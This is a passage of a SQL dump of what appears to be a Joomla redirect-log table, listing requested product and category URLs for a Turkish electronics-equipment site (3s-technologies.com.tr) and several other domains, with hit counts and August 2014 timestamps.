00:00:00',301),(1466,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=en','','','',6,0,'2014-08-07 12:11:59','0000-00-00 00:00:00',301),(1467,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',4,0,'2014-08-07 12:28:43','0000-00-00 00:00:00',301),(1468,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=en','','','',8,0,'2014-08-07 13:14:33','0000-00-00 00:00:00',301),(1469,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=tr','','','',3,0,'2014-08-07 13:28:12','0000-00-00 00:00:00',301),(1470,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=en','','','',10,0,'2014-08-07 13:40:37','0000-00-00 00:00:00',301),(1471,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',4,0,'2014-08-07 13:54:07','0000-00-00 00:00:00',301),(1472,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87&lang=tr','','','',15,0,'2014-08-07 13:57:38','0000-00-00 00:00:00',301),(1473,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',4,0,'2014-08-07 14:04:21','0000-00-00 00:00:00',301),(1474,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',5,0,'2014-08-07 14:06:05','0000-00-00 00:00:00',301),(1475,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=en','','','',10,0,'2014-08-07 14:11:28','0000-00-00 00:00:00',301),(1476,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=tr','','','',6,0,'2014-08-07 14:15:11','0000-00-00 00:00:00',301),(1477,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164','','','',1,0,'2014-08-07 14:18:28','0000-00-00 00:00:00',301),(1478,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=en','','','',5,0,'2014-08-07 14:26:50','0000-00-00 00:00:00',301),(1479,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=tr','','','',6,0,'2014-08-07 14:28:53','0000-00-00 00:00:00',301),(1480,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=tr','','','',9,0,'2014-08-07 14:32:50','0000-00-00 00:00:00',301),(1481,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154&lang=tr','','','',3,0,'2014-08-07 14:42:13','0000-00-00 00:00:00',301),(1482,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=en','','','',2,0,'2014-08-07 15:14:25','0000-00-00 00:00:00',301),(1483,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28','','','',5,0,'2014-08-07 15:17:28','0000-00-00 00:00:00',301),(1484,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',3,0,'2014-08-07 15:23:05','0000-00-00 00:00:00',301),(1485,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=tr','','','',19,0,'2014-08-07 15:23:09','0000-00-00 00:00:00',301),(1486,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=tr','','','',5,0,'2014-08-07 15:28:02','0000-00-00 00:00:00',301),(1487,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=47&Itemid=1&lang=en','','','',2,0,'2014-08-07 15:39:27','0000-00-00 00:00:00',301),(1488,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=113&Itemid=125&lang=en','','','',10,0,'2014-08-07 15:47:53','0000-00-00 00:00:00',301),(1489,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',27,0,'2014-08-07 15:47:56','0000-00-00 00:00:00',301),(1490,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=60&Itemid=164&lang=en','','','',2,0,'2014-08-07 15:47:59','0000-00-00 00:00:00',301),(1491,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=tr','','','',2,0,'2014-08-07 16:00:37','0000-00-00 00:00:00',301),(1492,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87&lang=tr','','','',6,0,'2014-08-07 16:02:23','0000-00-00 00:00:00',301),(1493,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=en','','','',2,0,'2014-08-07 16:06:35','0000-00-00 00:00:00',301),(1494,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=tr','','','',5,0,'2014-08-07 16:08:05','0000-00-00 00:00:00',301),(1495,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=&lang=en','','','',1,0,'2014-08-07 16:31:18','0000-00-00 00:00:00',301),(1496,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=en','','','',9,0,'2014-08-07 16:34:39','0000-00-00 00:00:00',301),(1497,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=tr','','','',20,0,'2014-08-07 16:41:49','0000-00-00 00:00:00',301),(1498,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=110&Itemid=121&lang=tr','','','',14,0,'2014-08-07 16:55:37','0000-00-00 00:00:00',301),(1499,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=46&Itemid=&lang=en','','','',1,0,'2014-08-07 17:11:59','0000-00-00 00:00:00',301),(1500,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',1,0,'2014-08-07 17:21:44','0000-00-00 00:00:00',301),(1501,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126','','','',8,0,'2014-08-07 17:25:49','0000-00-00 00:00:00',301),(1502,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=en','','','',8,0,'2014-08-07 17:27:25','0000-00-00 00:00:00',301),(1503,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=en','','','',2,0,'2014-08-07 17:28:38','0000-00-00 00:00:00',301),(1504,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=en','','','',11,0,'2014-08-07 17:36:20','0000-00-00 00:00:00',301),(1505,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=en','','','',5,0,'2014-08-07 17:41:21','0000-00-00 00:00:00',301),(1506,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=71&Itemid=79&lang=tr','','','',4,0,'2014-08-07 17:41:32','0000-00-00 00:00:00',301),(1507,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=tr','','','',14,0,'2014-08-07 17:46:50','0000-00-00 00:00:00',301),(1508,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=tr','','','',15,0,'2014-08-07 17:49:18','0000-00-00 00:00:00',301),(1509,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=114&Itemid=124&lang=en','','','',19,0,'2014-08-07 17:49:47','0000-00-00 00:00:00',301),(1510,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',24,0,'2014-08-07 17:50:00','0000-00-00 00:00:00',301),(1511,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=en','','','',6,0,'2014-08-07 17:57:21','0000-00-00 00:00:00',301),(1512,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=tr','','','',5,0,'2014-08-07 18:07:03','0000-00-00 00:00:00',301),(1513,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=147&Itemid=146&lang=tr','','','',1,0,'2014-08-07 18:21:40','0000-00-00 00:00:00',301),(1514,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',4,0,'2014-08-07 18:23:05','0000-00-00 00:00:00',301),(1515,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=tr','','','',2,0,'2014-08-07 18:28:33','0000-00-00 00:00:00',301),(1516,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',3,0,'2014-08-07 18:33:37','0000-00-00 00:00:00',301),(1517,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=145&Itemid=147&lang=tr','','','',4,0,'2014-08-07 18:35:07','0000-00-00 00:00:00',301),(1518,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','','',7,0,'2014-08-07 18:42:33','0000-00-00 00:00:00',301),(1519,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=tr','','','',3,0,'2014-08-07 19:04:16','0000-00-00 00:00:00',301),(1520,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=en','','','',18,0,'2014-08-07 19:07:34','0000-00-00 00:00:00',301),(1521,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr&limitstart=10','','','',2,0,'2014-08-07 19:30:25','0000-00-00 00:00:00',301),(1522,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',3,0,'2014-08-07 19:50:00','0000-00-00 00:00:00',301),(1523,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87&lang=tr','','','',15,0,'2014-08-07 20:31:21','0000-00-00 00:00:00',301),(1524,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=tr','','','',7,0,'2014-08-07 20:38:44','0000-00-00 00:00:00',301),(1525,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=tr','','','',6,0,'2014-08-07 21:03:28','0000-00-00 00:00:00',301),(1526,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103','','','',5,0,'2014-08-07 21:06:46','0000-00-00 00:00:00',301),(1527,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=tr','','','',5,0,'2014-08-07 21:16:47','0000-00-00 00:00:00',301),(1528,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=tr','','','',8,0,'2014-08-07 21:30:18','0000-00-00 00:00:00',301),(1529,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=tr','','','',1,0,'2014-08-07 21:31:48','0000-00-00 00:00:00',301),(1530,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&Itemid=43&lang=en','','','',4,0,'2014-08-07 21:33:17','0000-00-00 00:00:00',301),(1531,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=tr','','','',4,0,'2014-08-07 21:34:06','0000-00-00 00:00:00',301),(1532,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',1,0,'2014-08-07 21:41:32','0000-00-00 00:00:00',301),(1533,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=tr','','','',1,0,'2014-08-07 21:41:57','0000-00-00 00:00:00',301),(1534,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=tr','','','',4,0,'2014-08-07 21:43:31','0000-00-00 00:00:00',301),(1535,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',9,0,'2014-08-07 21:44:52','0000-00-00 00:00:00',301),(1536,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=47&Itemid=1&lang=en','','','',1,0,'2014-08-07 21:49:07','0000-00-00 00:00:00',301),(1537,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=47&Itemid=1&lang=tr','','','',1,0,'2014-08-07 21:49:18','0000-00-00 00:00:00',301),(1538,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',15,0,'2014-08-07 21:54:57','0000-00-00 00:00:00',301),(1539,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=en','','','',1,0,'2014-08-07 21:58:09','0000-00-00 00:00:00',301),(1540,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=tr','','','',5,0,'2014-08-07 21:59:52','0000-00-00 00:00:00',301),(1541,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71&Itemid=79&lang=tr','','','',2,0,'2014-08-07 22:01:30','0000-00-00 00:00:00',301),(1542,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',1,0,'2014-08-07 22:01:34','0000-00-00 00:00:00',301),(1543,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=en','','','',3,0,'2014-08-07 22:03:08','0000-00-00 00:00:00',301),(1544,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=tr','','','',1,0,'2014-08-07 22:03:15','0000-00-00 00:00:00',301),(1545,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=tr','','','',7,0,'2014-08-07 22:03:37','0000-00-00 00:00:00',301),(1546,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=en','','','',1,0,'2014-08-07 22:03:41','0000-00-00 00:00:00',301),(1547,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',7,0,'2014-08-07 22:04:49','0000-00-00 00:00:00',301),(1548,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',1,0,'2014-08-07 22:05:36','0000-00-00 00:00:00',301),(1549,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=tr','','','',1,0,'2014-08-07 22:07:05','0000-00-00 00:00:00',301),(1550,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=0&lang=en','','','',1,0,'2014-08-07 22:12:14','0000-00-00 00:00:00',301),(1551,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101','','','',4,0,'2014-08-07 22:21:08','0000-00-00 00:00:00',301),(1552,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=87&Itemid=99&lang=tr','','','',1,0,'2014-08-07 22:21:11','0000-00-00 00:00:00',301),(1553,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=tr','','','',7,0,'2014-08-07 22:28:03','0000-00-00 00:00:00',301),(1554,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=tr','','','',3,0,'2014-08-07 22:31:04','0000-00-00 00:00:00',301),(1555,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=94&Itemid=105&lang=tr','','','',1,0,'2014-08-07 22:31:47','0000-00-00 00:00:00',301),(1556,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=en','','','',6,0,'2014-08-07 22:39:02','0000-00-00 00:00:00',301),(1557,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',5,0,'2014-08-07 22:41:43','0000-00-00 00:00:00',301),(1558,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=tr','','','',1,0,'2014-08-07 22:59:12','0000-00-00 00:00:00',301),(1559,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=90&Itemid=102&lang=tr','','','',4,0,'2014-08-07 23:01:31','0000-00-00 00:00:00',301),(1560,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=en','','','',3,0,'2014-08-07 23:09:17','0000-00-00 00:00:00',301),(1561,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=tr','','','',5,0,'2014-08-07 23:13:13','0000-00-00 00:00:00',301),(1562,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=en','','','',6,0,'2014-08-07 23:16:44','0000-00-00 00:00:00',301),(1563,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=117&Itemid=128&lang=tr','','','',1,0,'2014-08-07 23:24:13','0000-00-00 00:00:00',301),(1564,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=126&Itemid=133&lang=en','','','',2,0,'2014-08-07 23:25:19','0000-00-00 00:00:00',301),(1565,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=137&Itemid=139&lang=en','','','',3,0,'2014-08-07 23:28:46','0000-00-00 00:00:00',301),(1566,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',2,0,'2014-08-07 23:29:52','0000-00-00 00:00:00',301),(1567,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=tr','','','',1,0,'2014-08-07 23:29:53','0000-00-00 00:00:00',301),(1568,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',3,0,'2014-08-07 23:31:39','0000-00-00 00:00:00',301),(1569,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=en','','','',10,0,'2014-08-07 23:32:20','0000-00-00 00:00:00',301),(1570,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=42&Itemid=&lang=tr','','','',1,0,'2014-08-07 23:33:00','0000-00-00 00:00:00',301),(1571,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=en','','','',34,0,'2014-08-07 23:33:42','0000-00-00 00:00:00',301),(1572,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=111&Itemid=122&lang=tr','','','',2,0,'2014-08-07 23:37:08','0000-00-00 00:00:00',301),(1573,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',1,0,'2014-08-07 23:38:48','0000-00-00 00:00:00',301),(1574,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',1,0,'2014-08-07 23:40:04','0000-00-00 00:00:00',301),(1575,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=39&Itemid=57&lang=en','','','',1,0,'2014-08-07 23:40:31','0000-00-00 00:00:00',301),(1576,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',8,0,'2014-08-07 23:40:56','0000-00-00 00:00:00',301),(1577,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=152&Itemid=153&lang=tr','','','',1,0,'2014-08-07 23:42:35','0000-00-00 00:00:00',301),(1578,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',7,0,'2014-08-07 23:42:50','0000-00-00 00:00:00',301),(1579,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=en','','','',2,0,'2014-08-07 23:44:05','0000-00-00 00:00:00',301),(1580,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',1,0,'2014-08-07 23:44:08','0000-00-00 00:00:00',301),(1581,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=60&Itemid=164&lang=en','','','',1,0,'2014-08-07 23:46:03','0000-00-00 00:00:00',301),(1582,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=tr','','','',2,0,'2014-08-07 23:48:37','0000-00-00 00:00:00',301),(1583,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=tr','','','',5,0,'2014-08-07 23:52:14','0000-00-00 00:00:00',301),(1584,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=en','','','',6,0,'2014-08-07 23:53:18','0000-00-00 00:00:00',301),(1585,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',1,0,'2014-08-07 23:55:39','0000-00-00 00:00:00',301),(1586,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103&lang=tr','','','',1,0,'2014-08-07 23:56:20','0000-00-00 00:00:00',301),(1587,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',54,0,'2014-08-08 00:02:14','0000-00-00 00:00:00',301),(1588,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=110&Itemid=121&lang=tr','','','',2,0,'2014-08-08 00:02:52','0000-00-00 00:00:00',301),(1589,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=en','','','',1,0,'2014-08-08 00:03:33','0000-00-00 00:00:00',301),(1590,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en','','','',3,0,'2014-08-08 00:08:50','0000-00-00 00:00:00',301),(1591,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=en','','','',1,0,'2014-08-08 00:11:04','0000-00-00 00:00:00',301),(1592,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=tr','','','',5,0,'2014-08-08 00:11:18','0000-00-00 00:00:00',301),(1593,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=tr','','','',1,0,'2014-08-08 00:11:26','0000-00-00 00:00:00',301),(1594,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',1,0,'2014-08-08 00:13:28','0000-00-00 00:00:00',301),(1595,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=85&Itemid=97&lang=tr','','','',3,0,'2014-08-08 00:16:44','0000-00-00 00:00:00',301),(1596,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=tr','','','',6,0,'2014-08-08 00:18:43','0000-00-00 00:00:00',301),(1597,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',3,0,'2014-08-08 00:20:00','0000-00-00 00:00:00',301),(1598,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=tr','','','',3,0,'2014-08-08 00:20:40','0000-00-00 00:00:00',301),(1599,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=105&Itemid=112&lang=en','','','',1,0,'2014-08-08 00:21:25','0000-00-00 00:00:00',301),(1600,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=en','','','',1,0,'2014-08-08 00:22:45','0000-00-00 00:00:00',301),(1601,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=168&Itemid=58&lang=tr','','','',1,0,'2014-08-08 00:22:45','0000-00-00 00:00:00',301),(1602,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',1,0,'2014-08-08 00:24:12','0000-00-00 00:00:00',301),(1603,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=en','','','',2,0,'2014-08-08 00:26:23','0000-00-00 00:00:00',301),(1604,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=tr','','','',4,0,'2014-08-08 